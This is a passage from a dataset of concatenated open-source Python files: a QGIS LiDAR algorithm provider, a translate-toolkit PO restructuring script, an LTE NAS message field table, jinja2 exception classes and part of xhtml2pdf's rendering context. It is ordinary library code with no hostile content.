                lasinfo(), lasprecision(), lasvalidate(), las2txt(), txt2las(),
                laszip(), lasindex(), lasmerge(), las2las_filter(), las2las_project(),
                las2las_transform(), lasquery()
            ]
        for alg in lastools:
            alg.group = 'LAStools'
        self.algsList.extend(lastools)
        # LAStools Production for processing folders of files
        if (isWindows() or LAStoolsUtils.hasWine()):
            lastoolsPro = [
                lastilePro(), lasgroundPro(), las2demPro(), lasheightPro(), laszipPro(),
                lasduplicatePro(), lasgridPro(), lassortPro(), lasclassifyPro(), lasthinPro(),
                lasnoisePro(), lasindexPro(), lascanopyPro(), blast2demPro(), lasboundaryPro(),
                lasinfoPro(), las2lasPro_filter(), las2lasPro_project(), las2lasPro_transform(),
                lasoveragePro(), txt2lasPro(), las2txtPro(), blast2isoPro(), lasvalidatePro(),
                lasmergePro(), lasviewPro(), lasoverlapPro()
            ]
        else:
            lastoolsPro = [
                laszipPro(), lasindexPro(), lasinfoPro(), las2lasPro_filter(), las2lasPro_project(),
                las2lasPro_transform(), txt2lasPro(), las2txtPro(), lasvalidatePro(), lasmergePro()
            ]
        for alg in lastoolsPro:
            alg.group = 'LAStools Production'
        self.algsList.extend(lastoolsPro)
        # some examples for LAStools Pipelines
        if (isWindows() or LAStoolsUtils.hasWine()):
            lastoolsPipe = [
                flightlinesToDTMandDSM(), flightlinesToCHM(), flightlinesToSingleCHMpitFree(), hugeFileClassify(),
                hugeFileGroundClassify(), hugeFileNormalize()
            ]
        else:
            lastoolsPipe = [ ]
        for alg in lastoolsPipe:
            alg.group = 'LAStools Pipelines'
        self.algsList.extend(lastoolsPipe)
        # FUSION
        if isWindows():
            self.actions.append(OpenViewerAction())
            fusiontools = [
                Catalog(), CloudMetrics(), CanopyMaxima(), CanopyModel(), ClipData(),
                Csv2Grid(), Cover(), FilterData(), GridMetrics(), GroundFilter(),
                GridSurfaceCreate(), MergeData(), TinSurfaceCreate()
            ]
            for alg in fusiontools:
                alg.group = 'Fusion'
            self.algsList.extend(fusiontools)

    def initializeSettings(self):
        """Register the LAStools/Fusion/Wine folder settings."""
        AlgorithmProvider.initializeSettings(self)
        ProcessingConfig.addSetting(Setting(
            self.getDescription(),
            LAStoolsUtils.LASTOOLS_FOLDER,
            self.tr('LAStools folder'), LAStoolsUtils.LAStoolsPath(),
            valuetype=Setting.FOLDER))
        ProcessingConfig.addSetting(Setting(
            self.getDescription(),
            FusionUtils.FUSION_FOLDER,
            self.tr('Fusion folder'), FusionUtils.FusionPath(),
            valuetype=Setting.FOLDER))
        ProcessingConfig.addSetting(Setting(
            self.getDescription(),
            LAStoolsUtils.WINE_FOLDER,
            self.tr('Wine folder'), '', valuetype=Setting.FOLDER))

    def getName(self):
        # Internal provider id used in algorithm identifiers.
        return 'lidartools'

    def getDescription(self):
        return self.tr('Tools for LiDAR data')

    def getIcon(self):
        return QIcon(os.path.dirname(__file__) + '/../../images/tool.png')

    def _loadAlgorithms(self):
        # Algorithms were instantiated once in __init__; just expose them.
        self.algs = self.algsList

    def getSupportedOutputTableExtensions(self):
        return ['csv']
| gpl-2.0 |
biswajitsahu/kuma | vendor/packages/translate/tools/porestructure.py | 24 | 5556 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2005, 2006 Zuza Software Foundation
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
"""Restructure Gettxt PO files produced by
:doc:`poconflicts </commands/poconflicts>` into the original directory tree
for merging using :doc:`pomerge </commands/pomerge>`.
See: http://docs.translatehouse.org/projects/translate-toolkit/en/latest/commands/pomerge.html
for examples and usage instructions.
"""
import os
import sys
from translate.misc import optrecurse
from translate.storage import po
class SplitOptionParser(optrecurse.RecursiveOptionParser):
"""a specialized Option Parser for posplit"""
def parse_args(self, args=None, values=None):
"""parses the command line options, handling implicit input/output args"""
(options, args) = optrecurse.RecursiveOptionParser.parse_args(self, args, values)
if not options.output:
self.error("Output file is rquired")
return (options, args)
def set_usage(self, usage=None):
"""sets the usage string - if usage not given, uses getusagestring for each option"""
if usage is None:
self.usage = "%prog " + " ".join([self.getusagestring(option) for option in self.option_list]) + \
"\n " + \
"input directory is searched for PO files with (poconflicts) comments, all entries are written to files in a directory structure for pomerge"
else:
super(SplitOptionParser, self).set_usage(usage)
def recursiveprocess(self, options):
"""recurse through directories and process files"""
if not self.isrecursive(options.output, 'output'):
try:
self.warning("Output directory does not exist. Attempting to create")
# TODO: maybe we should only allow it to be created, otherwise
# we mess up an existing tree.
os.mkdir(options.output)
except:
self.error(optrecurse.optparse.OptionValueError("Output directory does not exist, attempt to create failed"))
if self.isrecursive(options.input, 'input') and getattr(options, "allowrecursiveinput", True):
if isinstance(options.input, list):
inputfiles = self.recurseinputfilelist(options)
else:
inputfiles = self.recurseinputfiles(options)
else:
if options.input:
inputfiles = [os.path.basename(options.input)]
options.input = os.path.dirname(options.input)
else:
inputfiles = [options.input]
self.textmap = {}
self.initprogressbar(inputfiles, options)
for inputpath in inputfiles:
fullinputpath = self.getfullinputpath(options, inputpath)
try:
success = self.processfile(options, fullinputpath)
except Exception as error:
if isinstance(error, KeyboardInterrupt):
raise self.warning("Error processing: input %s" % (fullinputpath), options, sys.exc_info())
success = False
self.reportprogress(inputpath, success)
del self.progressbar
def processfile(self, options, fullinputpath):
    """Process an individual PO file.

    Each non-header, non-plural unit carrying a ``(poconflicts)`` marker
    comment is moved into the output file named inside that comment,
    creating or merging the target PO file as needed.
    """
    inputfile = self.openinputfile(options, fullinputpath)
    inputpofile = po.pofile(inputfile)
    for pounit in inputpofile.units:
        if not (pounit.isheader() or pounit.hasplural()):  # XXX plural units are skipped
            if pounit.hasmarkedcomment("poconflicts"):
                # Strip the marker; `comment` deliberately survives the loop
                # and is parsed below for the target path.
                # NOTE(review): if no comment matches, `comment` holds the last
                # element (or is unbound for an empty list) — hasmarkedcomment()
                # presumably guarantees a match; confirm.
                for comment in pounit.othercomments:
                    if comment.find("# (poconflicts)") == 0:
                        pounit.othercomments.remove(comment)
                        break
                # TODO: refactor writing out
                outputpath = comment[comment.find(")") + 2:].strip()
                self.checkoutputsubdir(options, os.path.dirname(outputpath))
                fulloutputpath = os.path.join(options.output, outputpath)
                if os.path.isfile(fulloutputpath):
                    # Merge into the existing file rather than overwriting it.
                    # Fix: close the handle (was leaked).
                    with open(fulloutputpath, 'r') as outputfile:
                        outputpofile = po.pofile(outputfile)
                else:
                    outputpofile = po.pofile()
                outputpofile.units.append(pounit)  # TODO: perhaps check to see if it's already there...
                # Fix: close the write handle so the data is flushed (was leaked).
                with open(fulloutputpath, 'w') as outputfile:
                    outputfile.write(str(outputpofile))
def main():
    """Command-line entry point: configure the option parser and run it."""
    # Output-file extensions are ultimately decided by the (poconflicts)
    # comments found inside the PO files themselves.
    po_handler = ("po", None)
    formats = {
        (None, None): po_handler,
        ("po", "po"): po_handler,
        "po": po_handler,
    }
    parser = SplitOptionParser(formats, description=__doc__)
    parser.set_usage()
    parser.run()


if __name__ == '__main__':
    main()
| mpl-2.0 |
acetcom/nextepc | lib/nas/eps/support/cache/nas-msg-214.py | 2 | 1879 | ies = []
# Generated table of information elements (IEs) for this NAS message.
# Each entry records: iei (IE identifier, empty for mandatory V/LV fields),
# value (display name), type, reference (section number — presumably
# 3GPP TS 24.301, confirm), presence (M = mandatory, O = optional),
# format (V/LV/TV/TLV/TLV-E) and length in octets.
ies.append({ "iei" : "", "value" : "EPS bearer identity for packet filter", "type" : "Linked EPS bearer identity", "reference" : "9.9.4.6", "presence" : "M", "format" : "V", "length" : "1/2"})
ies.append({ "iei" : "", "value" : "Traffic flow aggregate", "type" : "Traffic flow aggregate description", "reference" : "9.9.4.15", "presence" : "M", "format" : "LV", "length" : "2-256"})
ies.append({ "iei" : "5B", "value" : "Required traffic flow QoS", "type" : "EPS quality of service", "reference" : "9.9.4.3", "presence" : "O", "format" : "TLV", "length" : "3-15"})
ies.append({ "iei" : "58", "value" : "ESM cause", "type" : "ESM cause", "reference" : "9.9.4.4", "presence" : "O", "format" : "TV", "length" : "2"})
ies.append({ "iei" : "27", "value" : "Protocol configuration options", "type" : "Protocol configuration options", "reference" : "9.9.4.11", "presence" : "O", "format" : "TLV", "length" : "3-253"})
ies.append({ "iei" : "C-", "value" : "Device properties", "type" : "Device properties", "reference" : "9.9.2.0A", "presence" : "O", "format" : "TV", "length" : "1"})
ies.append({ "iei" : "33", "value" : "NBIFOM container", "type" : "NBIFOM container", "reference" : "9.9.4.19", "presence" : "O", "format" : "TLV", "length" : "3-257"})
ies.append({ "iei" : "66", "value" : "Header compression configuration", "type" : "Header compression configuration", "reference" : "9.9.4.22", "presence" : "O", "format" : "TLV", "length" : "5-257"})
ies.append({ "iei" : "7B", "value" : "Extended protocol configuration options", "type" : "Extended protocol configuration options", "reference" : "9.9.4.26", "presence" : "O", "format" : "TLV-E", "length" : "4-65538"})
ies.append({ "iei" : "5C", "value" : "Extended EPS QoS", "type" : "Extended quality of service", "reference" : "9.9.4.30", "presence" : "O", "format" : "TLV", "length" : "12"})
# Attach the assembled IE list to the message description being built.
msg_list[key]["ies"] = ies
| agpl-3.0 |
martydill/url_shortener | code/venv/lib/python2.7/site-packages/jinja2/exceptions.py | 977 | 4428 | # -*- coding: utf-8 -*-
"""
jinja2.exceptions
~~~~~~~~~~~~~~~~~
Jinja exceptions.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
from jinja2._compat import imap, text_type, PY2, implements_to_string
class TemplateError(Exception):
    """Baseclass for all template errors."""

    if PY2:
        # Python 2 branch: store the message UTF-8 encoded and decode it
        # back on access so `message` is always usable as text.
        def __init__(self, message=None):
            if message is not None:
                message = text_type(message).encode('utf-8')
            Exception.__init__(self, message)

        @property
        def message(self):
            # Returns None when no message was given (implicit fall-through).
            if self.args:
                message = self.args[0]
                if message is not None:
                    return message.decode('utf-8', 'replace')

        def __unicode__(self):
            return self.message or u''
    else:
        # Python 3 branch: strings are already text, no encoding dance.
        def __init__(self, message=None):
            Exception.__init__(self, message)

        @property
        def message(self):
            # Returns None when no message was given (implicit fall-through).
            if self.args:
                message = self.args[0]
                if message is not None:
                    return message
@implements_to_string
class TemplateNotFound(IOError, LookupError, TemplateError):
    """Raised if a template does not exist."""

    # looks weird, but removes the warning descriptor that just
    # bogusly warns us about message being deprecated
    message = None

    def __init__(self, name, message=None):
        IOError.__init__(self)
        # The message defaults to the template name itself.
        if message is None:
            message = name
        self.message = message
        self.name = name
        # `templates` mirrors the plural subclass's attribute for uniform access.
        self.templates = [name]

    def __str__(self):
        return self.message
class TemplatesNotFound(TemplateNotFound):
    """Like :class:`TemplateNotFound` but raised if multiple templates
    are selected.  This is a subclass of :class:`TemplateNotFound`
    exception, so just catching the base exception will catch both.

    .. versionadded:: 2.2
    """

    def __init__(self, names=(), message=None):
        if message is None:
            message = u'none of the templates given were found: ' + \
                u', '.join(imap(text_type, names))
        # Report the last candidate name as `name` (or None if empty).
        TemplateNotFound.__init__(self, names and names[-1] or None, message)
        self.templates = list(names)
@implements_to_string
class TemplateSyntaxError(TemplateError):
    """Raised to tell the user that there is a problem with the template."""

    def __init__(self, message, lineno, name=None, filename=None):
        TemplateError.__init__(self, message)
        self.lineno = lineno
        self.name = name
        self.filename = filename
        # Template source text; filled in later by the debugging machinery.
        self.source = None
        # this is set to True if the debug.translate_syntax_error
        # function translated the syntax error into a new traceback
        self.translated = False

    def __str__(self):
        # for translated errors we only return the message
        if self.translated:
            return self.message
        # otherwise attach some stuff
        location = 'line %d' % self.lineno
        name = self.filename or self.name
        if name:
            location = 'File "%s", %s' % (name, location)
        lines = [self.message, ' ' + location]
        # if the source is set, add the line to the output
        if self.source is not None:
            try:
                line = self.source.splitlines()[self.lineno - 1]
            except IndexError:
                line = None
            if line:
                lines.append(' ' + line.strip())
        return u'\n'.join(lines)
class TemplateAssertionError(TemplateSyntaxError):
    """Like a template syntax error, but covers cases where something in the
    template caused an error at compile time that wasn't necessarily caused
    by a syntax error.  However it's a direct subclass of
    :exc:`TemplateSyntaxError` and has the same attributes.
    """


class TemplateRuntimeError(TemplateError):
    """A generic runtime error in the template engine.  Under some situations
    Jinja may raise this exception.
    """


class UndefinedError(TemplateRuntimeError):
    """Raised if a template tries to operate on :class:`Undefined`."""


class SecurityError(TemplateRuntimeError):
    """Raised if a template tries to do something insecure if the
    sandbox is enabled.
    """


class FilterArgumentError(TemplateRuntimeError):
    """This error is raised if a filter was called with inappropriate
    arguments.
    """
| mit |
tinjyuu/xhtml2pdf | xhtml2pdf/context.py | 2 | 34095 | # -*- coding: utf-8 -*-
from reportlab.lib.enums import TA_LEFT
from reportlab.lib.fonts import addMapping
from reportlab.lib.pagesizes import landscape, A4
from reportlab.lib.styles import ParagraphStyle
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
from reportlab.platypus.frames import Frame, ShowBoundaryValue
from reportlab.platypus.paraparser import ParaFrag, ps2tt, tt2ps
from xhtml2pdf.util import getSize, getCoords, getFile, pisaFileObject, \
getFrameDimensions, getColor
from xhtml2pdf.w3c import css
from xhtml2pdf.xhtml2pdf_reportlab import PmlPageTemplate, PmlTableOfContents, \
PmlParagraph, PmlParagraphAndImage, PmlPageCount
import copy
import logging
import os
import re
import reportlab
import six
# Aliases mirroring the removed Python 2 `types` module names; used for
# `type(x) is TupleType`-style checks throughout this file.
TupleType = tuple
ListType = list
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
import xhtml2pdf.default
import xhtml2pdf.parser
# Copyright 2010 Dirk Holtwick, holtwick.it
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Silence reportlab's warnings about glyphs missing from embedded fonts.
reportlab.rl_config.warnOnMissingFontGlyphs = 0

log = logging.getLogger("xhtml2pdf")

sizeDelta = 2  # amount to reduce font size by for super and sub script
subFraction = 0.4  # fraction of font size that a sub script should be lowered
superFraction = 0.4  # fraction of font size that a super script should be raised
NBSP = u"\u00a0"  # non-breaking space character
def clone(self, **kwargs):
    """Return a copy of this ParaFrag, optionally overriding attributes.

    ``bulletText`` is always reset on the copy; when overrides are applied,
    any ``cbDefn`` callback definition is dropped so it is not shared
    between fragments.
    """
    n = ParaFrag(**self.__dict__)
    if kwargs:
        d = n.__dict__
        d.update(kwargs)
        # This else could cause trouble in Paragraphs with images etc.
        if "cbDefn" in d:
            del d["cbDefn"]
    n.bulletText = None
    return n


# Monkey-patch: give reportlab's ParaFrag a clone() helper used everywhere below.
ParaFrag.clone = clone
def getParaFrag(style):
    """Create a ParaFrag pre-populated with xhtml2pdf's default attributes.

    Starts from the given reportlab *style* and adds the extra fields
    (borders, padding, list style, outline flags, ...) that the rest of
    this module reads and writes on every fragment.
    """
    frag = ParaFrag()
    frag.sub = 0
    frag.super = 0
    frag.rise = 0
    frag.underline = 0  # XXX Need to be able to set color to fit CSS tests
    frag.strike = 0
    frag.greek = 0
    frag.link = None
    frag.text = ""
    frag.fontName = "Times-Roman"
    frag.fontName, frag.bold, frag.italic = ps2tt(style.fontName)
    frag.fontSize = style.fontSize
    frag.textColor = style.textColor

    # Extras
    frag.leading = 0
    frag.letterSpacing = "normal"
    frag.leadingSource = "150%"
    frag.leadingSpace = 0
    frag.backColor = None
    frag.spaceBefore = 0
    frag.spaceAfter = 0
    frag.leftIndent = 0
    frag.rightIndent = 0
    frag.firstLineIndent = 0
    frag.keepWithNext = False
    frag.alignment = TA_LEFT
    frag.vAlign = None

    # Border defaults; the per-side values below start out mirroring them.
    frag.borderWidth = 1
    frag.borderStyle = None
    frag.borderPadding = 0
    frag.borderColor = None

    frag.borderLeftWidth = frag.borderWidth
    frag.borderLeftColor = frag.borderColor
    frag.borderLeftStyle = frag.borderStyle
    frag.borderRightWidth = frag.borderWidth
    frag.borderRightColor = frag.borderColor
    frag.borderRightStyle = frag.borderStyle
    frag.borderTopWidth = frag.borderWidth
    frag.borderTopColor = frag.borderColor
    frag.borderTopStyle = frag.borderStyle
    frag.borderBottomWidth = frag.borderWidth
    frag.borderBottomColor = frag.borderColor
    frag.borderBottomStyle = frag.borderStyle

    frag.paddingLeft = 0
    frag.paddingRight = 0
    frag.paddingTop = 0
    frag.paddingBottom = 0

    frag.listStyleType = None
    frag.listStyleImage = None
    frag.whiteSpace = "normal"
    frag.wordWrap = None

    frag.pageNumber = False
    frag.pageCount = False
    frag.height = None
    frag.width = None

    frag.bulletIndent = 0
    frag.bulletText = None
    frag.bulletFontName = "Helvetica"

    frag.zoom = 1.0

    # PDF outline (bookmark) bookkeeping.
    frag.outline = False
    frag.outlineLevel = 0
    frag.outlineOpen = False

    frag.insideStaticFrame = 0

    return frag
def getDirName(path):
    """Return the directory containing *path*.

    Anything with a URL scheme (e.g. ``http://...``) is returned unchanged;
    local paths are resolved to the absolute directory name.
    """
    if urlparse.urlparse(path).scheme:
        return path
    return os.path.dirname(os.path.abspath(path))
class pisaCSSBuilder(css.CSSBuilder):
    """CSS builder translating @font-face, @page and @frame at-rules into
    embedded fonts, page templates and frames for the pisa context."""

    def atFontFace(self, declarations):
        """
        Embed fonts
        """
        result = self.ruleset([self.selector('*')], declarations)
        data = list(result[0].values())[0]
        if "src" not in data:
            # invalid - source is required, ignore this specification
            return {}, {}
        names = data["font-family"]

        # Font weight
        fweight = str(data.get("font-weight", "normal")).lower()
        bold = fweight in ("bold", "bolder", "500", "600", "700", "800", "900")
        if not bold and fweight != "normal":
            log.warn(self.c.warning("@fontface, unknown value font-weight '%s'", fweight))

        # Font style
        italic = str(data.get("font-style", "")).lower() in ("italic", "oblique")

        # The "src" attribute can be a CSS group but in that case
        # ignore everything except the font URI
        uri = data['src']
        if not isinstance(data['src'], str):
            for part in uri:
                if isinstance(part, str):
                    uri = part
                    break

        src = self.c.getFile(uri, relative=self.c.cssParser.rootPath)
        self.c.loadFont(
            names,
            src,
            bold=bold,
            italic=italic)
        return {}, {}

    def _pisaAddFrame(self, name, data, first=False, border=None, size=(0, 0)):
        """Build the 8-tuple frame description appended to c.frameList.

        For the first (content) frame the static-content slot is None;
        otherwise it is taken from "-pdf-frame-content".
        """
        c = self.c
        if not name:
            name = "-pdf-frame-%d" % c.UID()
        if data.get('is_landscape', False):
            size = (size[1], size[0])
        x, y, w, h = getFrameDimensions(data, size[0], size[1])
        # print name, x, y, w, h
        #if not (w and h):
        #    return None
        if first:
            return name, None, data.get("-pdf-frame-border", border), x, y, w, h, data
        return (name, data.get("-pdf-frame-content", None),
                data.get("-pdf-frame-border", border), x, y, w, h, data)

    def _getFromData(self, data, attr, default=None, func=None):
        """Look up *attr* (or the first match from a tuple of names) in *data*,
        passing the value through *func*; return *default* when absent."""
        if not func:
            func = lambda x: x
        if type(attr) in (list, tuple):
            for a in attr:
                if a in data:
                    return func(data[a])
            return default
        else:
            if attr in data:
                return func(data[attr])
            return default

    def atPage(self, name, pseudopage, declarations):
        """Handle an @page rule: resolve page size/orientation, materialise
        all collected @frame definitions and register a PmlPageTemplate."""
        c = self.c
        data = {}
        name = name or "body"
        pageBorder = None

        if declarations:
            result = self.ruleset([self.selector('*')], declarations)
            if declarations:
                try:
                    # Python 2: dict.values() is a list and is subscriptable.
                    data = result[0].values()[0]
                except Exception:
                    # Python 3 fallback: views are not subscriptable.
                    data = result[0].popitem()[1]
                pageBorder = data.get("-pdf-frame-border", None)

        if name in c.templateList:
            log.warn(self.c.warning("template '%s' has already been defined", name))

        if "-pdf-page-size" in data:
            c.pageSize = xhtml2pdf.default.PML_PAGESIZES.get(str(data["-pdf-page-size"]).lower(), c.pageSize)

        isLandscape = False
        if "size" in data:
            size = data["size"]
            if type(size) is not ListType:
                size = [size]
            sizeList = []
            for value in size:
                valueStr = str(value).lower()
                if type(value) is TupleType:
                    sizeList.append(getSize(value))
                elif valueStr == "landscape":
                    isLandscape = True
                elif valueStr == "portrait":
                    isLandscape = False
                elif valueStr in xhtml2pdf.default.PML_PAGESIZES:
                    c.pageSize = xhtml2pdf.default.PML_PAGESIZES[valueStr]
                else:
                    raise RuntimeError("Unknown size value for @page")

            if len(sizeList) == 2:
                c.pageSize = tuple(sizeList)
            if isLandscape:
                c.pageSize = landscape(c.pageSize)

        # Page-level padding/border defaults inherited by frames below.
        padding_top = self._getFromData(data, 'padding-top', 0, getSize)
        padding_left = self._getFromData(data, 'padding-left', 0, getSize)
        padding_right = self._getFromData(data, 'padding-right', 0, getSize)
        padding_bottom = self._getFromData(data, 'padding-bottom', 0, getSize)
        border_color = self._getFromData(data, ('border-top-color', 'border-bottom-color',
                                                'border-left-color', 'border-right-color'), None, getColor)
        border_width = self._getFromData(data, ('border-top-width', 'border-bottom-width',
                                                'border-left-width', 'border-right-width'), 0, getSize)

        # Any explicit geometry on @page itself defines an implicit first frame.
        for prop in ("margin-top", "margin-left", "margin-right", "margin-bottom",
                     "top", "left", "right", "bottom", "width", "height"):
            if prop in data:
                c.frameList.append(self._pisaAddFrame(name, data, first=True, border=pageBorder, size=c.pageSize))
                break

        # Frames have to be calculated after we know the pagesize
        frameList = []
        staticList = []
        for fname, static, border, x, y, w, h, fdata in c.frameList:
            fpadding_top = self._getFromData(fdata, 'padding-top', padding_top, getSize)
            fpadding_left = self._getFromData(fdata, 'padding-left', padding_left, getSize)
            fpadding_right = self._getFromData(fdata, 'padding-right', padding_right, getSize)
            fpadding_bottom = self._getFromData(fdata, 'padding-bottom', padding_bottom, getSize)
            fborder_color = self._getFromData(fdata, ('border-top-color', 'border-bottom-color',
                                                      'border-left-color', 'border-right-color'), border_color, getColor)
            fborder_width = self._getFromData(fdata, ('border-top-width', 'border-bottom-width',
                                                      'border-left-width', 'border-right-width'), border_width, getSize)

            if border or pageBorder:
                frame_border = ShowBoundaryValue()
            else:
                frame_border = ShowBoundaryValue(color=fborder_color, width=fborder_width)

            #fix frame sizing problem.
            if static:
                x, y, w, h = getFrameDimensions(fdata, c.pageSize[0], c.pageSize[1])
            x, y, w, h = getCoords(x, y, w, h, c.pageSize)
            if w <= 0 or h <= 0:
                log.warn(self.c.warning("Negative width or height of frame. Check @frame definitions."))

            frame = Frame(
                x, y, w, h,
                id=fname,
                leftPadding=fpadding_left,
                rightPadding=fpadding_right,
                bottomPadding=fpadding_bottom,
                topPadding=fpadding_top,
                showBoundary=frame_border)

            if static:
                frame.pisaStaticStory = []
                c.frameStatic[static] = [frame] + c.frameStatic.get(static, [])
                staticList.append(frame)
            else:
                frameList.append(frame)

        background = data.get("background-image", None)
        if background:
            #should be relative to the css file
            background = self.c.getFile(background, relative=self.c.cssParser.rootPath)

        if not frameList:
            log.warn(c.warning("missing explicit frame definition for content or just static frames"))
            fname, static, border, x, y, w, h, data = self._pisaAddFrame(name, data, first=True, border=pageBorder,
                                                                         size=c.pageSize)
            x, y, w, h = getCoords(x, y, w, h, c.pageSize)
            if w <= 0 or h <= 0:
                log.warn(c.warning("Negative width or height of frame. Check @page definitions."))

            if border or pageBorder:
                frame_border = ShowBoundaryValue()
            else:
                frame_border = ShowBoundaryValue(color=border_color, width=border_width)

            frameList.append(Frame(
                x, y, w, h,
                id=fname,
                leftPadding=padding_left,
                rightPadding=padding_right,
                bottomPadding=padding_bottom,
                topPadding=padding_top,
                showBoundary=frame_border))

        pt = PmlPageTemplate(
            id=name,
            frames=frameList,
            pagesize=c.pageSize,
        )
        pt.pisaStaticList = staticList
        pt.pisaBackground = background
        pt.pisaBackgroundList = c.pisaBackgroundList

        if isLandscape:
            pt.pageorientation = pt.LANDSCAPE

        c.templateList[name] = pt
        c.template = None
        # Frames collected so far belong to this template only; reset.
        c.frameList = []
        c.frameStaticList = []

        return {}, {}

    def atFrame(self, name, declarations):
        """Handle an @frame rule by queueing a frame description; the frame
        itself is realised later by atPage once the page size is known."""
        if declarations:
            result = self.ruleset([self.selector('*')], declarations)
            # print "@BOX", name, declarations, result
            data = result[0]
            if data:
                try:
                    # Python 2: subscriptable values(); Python 3 falls back below.
                    data = data.values()[0]
                except Exception:
                    data = data.popitem()[1]
                self.c.frameList.append(
                    self._pisaAddFrame(name, data, size=self.c.pageSize))
        return {}, {}  # TODO: It always returns empty dicts?
class pisaCSSParser(css.CSSParser):
    """CSS parser that resolves @import-ed stylesheets relative to the
    current root path (URL or directory)."""

    def parseExternal(self, cssResourceName):
        """Parse an external stylesheet, temporarily switching rootPath so
        that relative references inside it resolve correctly."""
        oldRootPath = self.rootPath
        cssFile = self.c.getFile(cssResourceName, relative=self.rootPath)
        if not cssFile:
            return None
        if self.rootPath and urlparse.urlparse(self.rootPath).scheme:
            # Remote stylesheet: resolve against the URL.
            self.rootPath = urlparse.urljoin(self.rootPath, cssResourceName)
        else:
            # Local stylesheet: resolve against its directory.
            self.rootPath = getDirName(cssFile.uri)
        result = self.parse(cssFile.getData())
        self.rootPath = oldRootPath
        return result
class pisaContext(object):
    """
    Helper class for creation of reportlab story and container for
    various data.
    """

    def __init__(self, path, debug=0, capacity=-1):
        self.fontList = copy.copy(xhtml2pdf.default.DEFAULT_FONT)
        self.path = []
        self.capacity = capacity

        self.node = None
        self.toc = PmlTableOfContents()
        self.story = []
        self.indexing_story = None
        # NOTE(review): self.text is assigned a list here and a unicode
        # string a few lines below; the first assignment looks redundant.
        self.text = []
        self.log = []
        self.err = 0
        self.warn = 0
        self.text = u""
        self.uidctr = 0
        self.multiBuild = False

        self.pageSize = A4
        self.template = None
        self.templateList = {}

        self.frameList = []
        self.frameStatic = {}
        self.frameStaticList = []
        self.pisaBackgroundList = []

        self.keepInFrameIndex = None

        self.baseFontSize = getSize("12pt")

        self.anchorFrag = []
        self.anchorName = []

        self.tableData = None

        self.frag = self.fragBlock = getParaFrag(ParagraphStyle('default%d' % self.UID()))
        self.fragList = []
        self.fragAnchor = []
        self.fragStack = []
        self.fragStrip = True

        self.listCounter = 0

        self.cssText = ""
        self.cssDefaultText = ""

        self.image = None
        self.imageData = {}
        self.force = False

        self.pathCallback = None  # External callback function for path calculations

        # Store path to document
        self.pathDocument = path or "__dummy__"
        parts = urlparse.urlparse(self.pathDocument)
        if not parts.scheme:
            self.pathDocument = os.path.abspath(self.pathDocument)
        self.pathDirectory = getDirName(self.pathDocument)

        self.meta = dict(
            author="",
            title="",
            subject="",
            keywords="",
            pagesize=A4,
        )

    def UID(self):
        """Return a new unique integer id (monotonically increasing)."""
        self.uidctr += 1
        return self.uidctr

    # METHODS FOR CSS
    def addCSS(self, value):
        """Append raw CSS text, stripping CDATA/HTML-comment wrappers."""
        value = value.strip()
        if value.startswith("<![CDATA["):
            value = value[9: - 3]
        if value.startswith("<!--"):
            value = value[4: - 3]
        self.cssText += value.strip() + "\n"

    # METHODS FOR CSS
    def addDefaultCSS(self, value):
        """Append default (user-agent) CSS text, stripping wrappers."""
        value = value.strip()
        if value.startswith("<![CDATA["):
            value = value[9: - 3]
        if value.startswith("<!--"):
            value = value[4: - 3]
        self.cssDefaultText += value.strip() + "\n"

    def parseCSS(self):
        # This self-reference really should be refactored. But for now
        # we'll settle for using weak references. This avoids memory
        # leaks because the garbage collector (at least on cPython
        # 2.7.3) isn't aggressive enough.
        import weakref
        self.cssBuilder = pisaCSSBuilder(mediumSet=["all", "print", "pdf"])
        #self.cssBuilder.c = self
        self.cssBuilder._c = weakref.ref(self)
        pisaCSSBuilder.c = property(lambda self: self._c())
        self.cssParser = pisaCSSParser(self.cssBuilder)
        self.cssParser.rootPath = self.pathDirectory
        #self.cssParser.c = self
        self.cssParser._c = weakref.ref(self)
        pisaCSSParser.c = property(lambda self: self._c())

        self.css = self.cssParser.parse(self.cssText)
        self.cssDefault = self.cssParser.parse(self.cssDefaultText)
        self.cssCascade = css.CSSCascadeStrategy(userAgent=self.cssDefault, user=self.css)
        self.cssCascade.parser = self.cssParser

    # METHODS FOR STORY
    def addStory(self, data):
        """Append a flowable to the story."""
        self.story.append(data)

    def swapStory(self, story=None):
        """Swap the current story with *story* and return the old one."""
        story = story if story is not None else []
        self.story, story = copy.copy(story), copy.copy(self.story)
        return story

    def toParagraphStyle(self, first):
        """Build a reportlab ParagraphStyle from the first fragment's attributes."""
        style = ParagraphStyle('default%d' % self.UID(), keepWithNext=first.keepWithNext)
        style.fontName = first.fontName
        style.fontSize = first.fontSize
        style.letterSpacing = first.letterSpacing
        style.leading = max(first.leading + first.leadingSpace, first.fontSize * 1.25)
        style.backColor = first.backColor
        style.spaceBefore = first.spaceBefore
        style.spaceAfter = first.spaceAfter
        style.leftIndent = first.leftIndent
        style.rightIndent = first.rightIndent
        style.firstLineIndent = first.firstLineIndent
        style.textColor = first.textColor
        style.alignment = first.alignment
        style.bulletFontName = first.bulletFontName or first.fontName
        style.bulletFontSize = first.fontSize
        style.bulletIndent = first.bulletIndent
        style.wordWrap = first.wordWrap

        # Border handling for Paragraph

        # Transfer the styles for each side of the border, *not* the whole
        # border values that reportlab supports. We'll draw them ourselves in
        # PmlParagraph.
        style.borderTopStyle = first.borderTopStyle
        style.borderTopWidth = first.borderTopWidth
        style.borderTopColor = first.borderTopColor
        style.borderBottomStyle = first.borderBottomStyle
